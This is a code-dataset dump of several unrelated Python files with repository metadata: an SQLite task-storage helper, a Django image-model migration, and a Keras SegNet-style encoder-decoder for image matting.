self.run_test_on_real_rasters(12, Resampling.cubic, False)
def test_zoom_remote_14_resampling_cubic(self):
self.run_test_on_real_rasters(14, Resampling.cubic, False)
def test_zoom_remote_15_resampling_cubic(self):
self.run_test_on_real_rasters(15, Resampling.cubic, False)
def test_zoom_remote_17_resampling_cubic(self):
self.run_test_on_real_rasters(17, Resampling.cubic, False)
def test_zoom_remote_18_resampling_cubic(self):
self.run_test_on_real_rasters(18, Resampling.cubic, False)
| true
| true
|
790dc05f4c0d5872bd7a197900cdb588ebac477b
| 6,501
|
py
|
Python
|
client-autosense/sense/sqlite_syn.py
|
zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
client-autosense/sense/sqlite_syn.py
|
zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
client-autosense/sense/sqlite_syn.py
|
zxypic/PublicPic
|
8bec621e38955fb061220bf56c2961122651ff9d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sqlite3
import logging
logger = logging.getLogger("xtc")
class sqlite_handle(object):
def __init__(self):
self.dbname = "Xsense.db"
self.conn = None
def db_init(self):  # initialize db tables: task_info, apps, scripts, run_tasks
self.db_table_all()
conn = sqlite3.connect(self.dbname)
try:
for cre in self.create_dic:
conn.execute(cre)
# logger.info(cre)
except Exception as e:
logger.info("Create table failed: {}".format(e))
return False
finally:
conn.close()
def insert_task(self, taskdict):  # insert task records one by one
conn = sqlite3.connect(self.dbname)
for task in taskdict:
conn.execute(
'INSERT INTO task_Info VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)',task
)
conn.commit()
conn.close()
def insert_script_one(self, scriptOne):  # insert a single script record
conn = sqlite3.connect(self.dbname)
conn.execute(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',scriptOne
)
conn.commit()
conn.close()
def insert_task_many(self, script_data):  # insert multiple script records (note: writes to the scripts table despite the name)
conn = sqlite3.connect(self.dbname)
conn.executemany(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',script_data
)
conn.commit()
conn.close()
def db_table_all(self):
crt_task_info = '''CREATE TABLE IF NOT EXISTS task_info (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
crt_scripts = '''CREATE TABLE IF NOT EXISTS scripts (
scriptId INT, scriptName TEXT, scriptType int,scriptUrl TEXT,
uploadDate int, scriptMaxRunTime int, scriptVersion int,
scriptCacheUrl TEXT
);'''
crt_apps = '''CREATE TABLE IF NOT EXISTS apps (
scriptId INT, appCheck int, appPackageName TEXT, appUrl TEXT, appMd5 TEXT,
appVersion TEXT, appVersionCode TEXT, appLastUpdateTime TEXT, appCacheUrl TEXT
);'''
run_tasks = '''CREATE TABLE IF NOT EXISTS run_tasks (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
create_dic = []
create_dic.append(crt_task_info)
create_dic.append(crt_scripts)
create_dic.append(crt_apps)
create_dic.append(run_tasks)  # stores tasks queued to run; unclear whether this table is really needed
self.create_dic = create_dic
def query_runtask(self):
conn = sqlite3.connect(self.dbname)
taskrows = []  # each element is a tuple, e.g. (205937, 'pyclient-test', 1, 107864, 'http://202.105.193....69910.zip', 20191006000000, 20201231235959, '000000', '235959', 2, 1, 1, 1)
# fetch distinct unfinished count-based tasks (new + started); exeType=2 means run by count, exeType=1 means run on schedule
# optType: 1=new task; 2=paused task; 3=started task; 4=deleted task
# parentheses around the OR are needed: SQL AND binds tighter than OR
for row in conn.execute('SELECT DISTINCT * FROM task_info WHERE (optType=3 OR optType=1) AND exeType=2 AND startIterationNumber<=iterationNum'):
taskrows.append(row)
conn.close()
return taskrows
def dele_table(self):
pass
def query(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
# cursor = self.conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
data = cursor.fetchall()
cursor.close()
return data
def update(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
# cursor = self.conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
conn.commit()
cursor.close()
def _update(self, sql, value=None, querymany=True):
ret = True
try:
if querymany:
self.update(sql, value)
else:
self.update(sql)
#except SqliteException:
except Exception as e:
logger.info("error('执行sqlite: {} 时出错:{}')".format(sql, e))
ret = False
return ret
def del_task_byid(self, taskid):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
sql = 'DELETE FROM task_info WHERE taskid={}'.format(taskid)
cursor.execute(sql)
logger.info("刪除taskid={} cursor.rowcount={}".format(taskid, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_status(self, taskid, status):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET optType={} WHERE taskid={}".format(status, taskid))
logger.info("更新taskid={},设置optType={},cursor.rowcount={}".format(taskid, status, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_count(self, taskid, run_count):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET startIterationNumber={} WHERE taskid={}".format(run_count, taskid))
logger.info("更新taskid={},startIterationNumber={},cursor.rowcount={}".format(taskid, run_count, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def updata_table(self):
pass
if __name__ == "__main__":
handle = sqlite_handle()
if not os.path.isfile(handle.dbname):
handle.db_init()
#taskrows = handle.query_runtask()
#print("taskrows=" + str(taskrows))
#handle.del_task_byid("1235")
handle.update_task_run_count("206266", 60)
#handle.update_task_run_status("206266", "5")
# update/delete single tasks; update script info
# before downloading, query the db: if the script id already exists with the same update time, skip the download; otherwise download and then insert
# when tasks run, first check for new tasks; if there are any, insert them
# if there are no new tasks, query the db and check whether each task id meets a removal condition (expired, finished, etc.)
# if the completed rounds reach the total rounds, delete the task
# if the end time is already past the current time, delete the task
# TODO: sort by id here before running
# after a run finishes, update the round counter for that id
# today: finish script execution and result files, then do the db update and remove (a runnable sketch of this pruning flow follows)
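A minimal sketch of the pruning flow outlined in the notes above, using only handlers defined in this module. The helper name prune_and_advance is hypothetical, the tuple indices follow the task_info column order, and comparing endDate against a yyyymmddHHMMSS integer is an assumption based on the sample row:
from datetime import datetime

def prune_and_advance(handle):  # hypothetical helper, not part of the original module
    now = int(datetime.now().strftime("%Y%m%d%H%M%S"))  # same format as endDate, e.g. 20201231235959
    for row in sorted(handle.query_runtask(), key=lambda r: r[0]):  # run in taskId order
        task_id, end_date = row[0], row[6]
        iteration_num, start_iteration = row[11], row[12]
        if start_iteration >= iteration_num or end_date < now:
            handle.del_task_byid(task_id)  # all rounds done, or past the end time
        else:
            handle.update_task_run_count(task_id, start_iteration + 1)  # record another round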
| 36.318436
| 167
| 0.591601
|
import os
import sqlite3
import logging
logger = logging.getLogger("xtc")
class sqlite_handle(object):
def __init__(self):
self.dbname = "Xsense.db"
self.conn = None
def db_init(self):
self.db_table_all()
conn = sqlite3.connect(self.dbname)
try:
for cre in self.create_dic:
conn.execute(cre)
except Exception as e:
logger.info("Create table failed: {}".format(e))
return False
finally:
conn.close()
def insert_task(self,taskdict):
conn = sqlite3.connect(self.dbname)
for task in taskdict:
conn.execute(
'INSERT INTO task_Info VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?)',task
)
conn.commit()
conn.close()
def insert_script_one(self,scriptOne):
conn = sqlite3.connect(self.dbname)
conn.execute(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',scriptOne
)
conn.commit()
conn.close()
def insert_task_many(self,script_data):
conn = sqlite3.connect(self.dbname)
conn.executemany(
'INSERT INTO scripts VALUES (?,?,?,?,?,?,?,?)',script_data
)
conn.commit()
conn.close()
def db_table_all(self):
crt_task_info = '''CREATE TABLE IF NOT EXISTS task_info (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
crt_scripts = '''CREATE TABLE IF NOT EXISTS scripts (
scriptId INT, scriptName TEXT, scriptType int,scriptUrl TEXT,
uploadDate int, scriptMaxRunTime int, scriptVersion int,
scriptCacheUrl TEXT
);'''
crt_apps = '''CREATE TABLE IF NOT EXISTS apps (
scriptId INT, appCheck int, appPackageName TEXT, appUrl TEXT, appMd5 TEXT,
appVersion TEXT, appVersionCode TEXT, appLastUpdateTime TEXT, appCacheUrl TEXT
);'''
run_tasks = '''CREATE TABLE IF NOT EXISTS run_tasks (
taskId INT, testTaskName TEXT, optType int,scriptId INT,scriptUrl TEXT,
startDate int, endDate int, exeBeginTime TEXT, exeEndTime TEXT,
exeType int, interval int, iterationNum int, startIterationNumber int
);'''
create_dic = []
create_dic.append(crt_task_info)
create_dic.append(crt_scripts)
create_dic.append(crt_apps)
create_dic.append(run_tasks)
self.create_dic = create_dic
def query_runtask(self):
conn = sqlite3.connect(self.dbname)
taskrows = []
for row in conn.execute('SELECT DISTINCT * FROM task_info WHERE (optType=3 OR optType=1) AND exeType=2 AND startIterationNumber<=iterationNum'):
taskrows.append(row)
conn.close()
return taskrows
def dele_table(self):
pass
def query(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
data = cursor.fetchall()
cursor.close()
return data
def update(self, sql, sqlstring=False):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
if sqlstring:
cursor.executemany(sql, sqlstring)
else:
cursor.execute(sql)
conn.commit()
cursor.close()
def _update(self, sql, value=None, querymany=True):
ret = True
try:
if querymany:
self.update(sql, value)
else:
self.update(sql)
except Exception as e:
logger.info("error('执行sqlite: {} 时出错:{}')".format(sql, e))
ret = False
return ret
def del_task_byid(self, taskid):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
sql = 'DELETE FROM task_info WHERE taskid={}'.format(taskid)
cursor.execute(sql)
logger.info("刪除taskid={} cursor.rowcount={}".format(taskid, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_status(self, taskid, status):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET optType={} WHERE taskid={}".format(status, taskid))
logger.info("更新taskid={},设置optType={},cursor.rowcount={}".format(taskid, status, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def update_task_run_count(self, taskid, run_count):
conn = sqlite3.connect(self.dbname)
cursor = conn.cursor()
cursor.execute("UPDATE task_info SET startIterationNumber={} WHERE taskid={}".format(run_count, taskid))
logger.info("更新taskid={},startIterationNumber={},cursor.rowcount={}".format(taskid, run_count, str(cursor.rowcount)))
conn.commit()
cursor.close()
conn.close()
def updata_table(self):
pass
if __name__ == "__main__":
handle = sqlite_handle()
if not os.path.isfile(handle.dbname):
handle.db_init()
handle.update_task_run_count("206266", 60)
| true
| true
|
790dc1204f7d88fa8e7a6bfc76e42000069a6612
| 1,009
|
py
|
Python
|
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | null | null | null |
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | 4
|
2020-06-06T01:10:11.000Z
|
2021-09-08T02:04:23.000Z
|
grid/migrations/0002_image.py
|
greatdaniels/gallery-app
|
e4749ca4ab02b0715e707856aa9d28cc66b7ebc5
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.6 on 2020-05-24 13:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('grid', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img_name', models.CharField(max_length=30)),
('img_description', models.TextField()),
('photo', models.ImageField(default='', upload_to='images/')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Category')),
('editor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Editor')),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Location')),
],
),
]
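For context, a minimal usage sketch against the model this migration creates; the import path grid.models and the pre-existing Category/Editor/Location rows are assumptions:
from grid.models import Image, Category, Editor, Location  # assumed import path

image = Image.objects.create(
    img_name='lakeside',  # CharField, max_length=30
    img_description='Morning shot by the lake',
    photo='images/lakeside.jpg',  # ImageField, upload_to='images/'
    category=Category.objects.first(),
    editor=Editor.objects.first(),
    location=Location.objects.first(),
)
print(image.id)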
| 37.37037
| 114
| 0.60555
|
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('grid', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Image',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('img_name', models.CharField(max_length=30)),
('img_description', models.TextField()),
('photo', models.ImageField(default='', upload_to='images/')),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Category')),
('editor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Editor')),
('location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='grid.Location')),
],
),
]
| true
| true
|
790dc142b9a7987a252d5c15f3f5739223b31b94
| 9,171
|
py
|
Python
|
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
segnet_v7.py
|
vietnamican/Deep-Image-Matting
|
436487e680027f07387700fb8ee1486635b82335
|
[
"MIT"
] | null | null | null |
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
# Conv + MaxPool encoder with spatial pyramid pooling (SPP/ASPP); roughly 24M parameters
def build_encoder_decoder():
# Encoder
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
# Image average pooling
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
# Concat
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
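# the concat stacks five 512-channel branches (1x1, three dilated 3x3, image-level) into 2560 channels before the 1x1 reductions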
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
# Decoder
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
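# Unpooling recombines the upsampled features with the pre-pool encoder activations (orig_5), acting as a skip connection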
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
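A minimal smoke test for the two builders, assuming the custom Unpooling layer is importable and skipping the multi-GPU wrapper:
import numpy as np

encoder_decoder = build_encoder_decoder()
refinement = build_refinement(encoder_decoder)
batch = np.random.rand(2, 320, 320, 4).astype('float32')  # RGB + trimap channel
coarse = encoder_decoder.predict(batch)  # coarse alpha matte
refined = refinement.predict(batch)  # refined alpha matte
assert coarse.shape == refined.shape == (2, 320, 320, 1)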
| 44.736585
| 141
| 0.637771
|
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
def build_encoder_decoder():
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
